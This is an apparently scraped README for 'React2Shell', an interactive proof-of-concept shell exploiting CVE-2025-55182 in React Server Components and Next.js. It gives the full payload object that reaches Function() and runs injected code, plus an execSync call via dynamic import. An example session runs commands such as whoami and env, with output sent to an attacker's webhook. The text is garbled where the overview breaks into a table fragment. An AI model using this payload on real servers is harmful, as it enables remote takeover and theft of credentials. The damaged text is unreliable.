Share
## https://sploitus.com/exploit?id=8FEADF80-333D-57BE-A90A-869E659770A3
# React2Shell - CVE-2025-55182 Interactive PoC

Interactive shell for exploiting CVE-2025-55182, a Remote Code Execution vulnerability in React Server Components.

## Disclaimer

**This tool is provided for EDUCATIONAL and AUTHORIZED SECURITY TESTING purposes only.**

- Only use on systems you own or have explicit written permission to test
- Unauthorized access to computer systems is illegal
- The author is not responsible for any misuse of this tool
- This is a proof-of-concept for security research and awareness

## Vulnerability Overview

CVE-2025-55182 affects React Server Components (RSC) in:
- **Next.js** ` | Execute custom JavaScript |
| `!help` | Show help |
| `!exit` | Exit |
| `` | Execute shell command (e.g., `whoami`, `ls`, `cat /etc/passwd`) |

### Example Session

```
react2shell> !test
[+] Sent! Check webhook

react2shell> whoami
[+] Sent: whoami

react2shell> ls -la
[+] Sent: ls -la

react2shell> !env
[+] Sent! Check webhook for env vars
```

Results appear on your webhook, not in the terminal.

## Technical Details

### Payload Structure

```javascript
{
    '0': '$1',
    '1': {
        'status': 'resolved_model',
        'reason': 0,
        '_response': '$4',
        'value': '{"then":"$3:map","0":{"then":"$B3"},"length":1}',
        'then': '$2:then'
    },
    '2': '$@3',
    '3': [],
    '4': {
        '_prefix': '//',
        '_formData': { 'get': '$3:constructor:constructor' },
        '_chunks': '$2:_response:_chunks'
    }
}
```

### Execution Flow

1. Payload is sent as multipart form data with `next-action` header
2. React Flight parser processes the chunks
3. `$@3` creates a Chunk reference
4. `$3:constructor:constructor` traverses to `Function`
5. `_prefix` content is passed to `Function()` and executed

### Notes for Next.js 15+

- Uses ESM modules, so `require()` is not available
- Use dynamic `import()` instead:
  ```javascript
  import("child_process").then(cp => cp.execSync("whoami"))
  ```

## Patched Versions

Update to these versions to fix the vulnerability:

- Next.js >= 15.1.7
- Next.js >= 14.2.29
- Next.js >= 13.5.9

## References

- [React2Shell Official Site](https://react2shell.com)
- [Google Tsunami Scanner Plugin](https://github.com/google/tsunami-security-scanner-plugins)

## License

MIT License - For educational purposes only.

## Author

Security Research PoC - Use responsibly.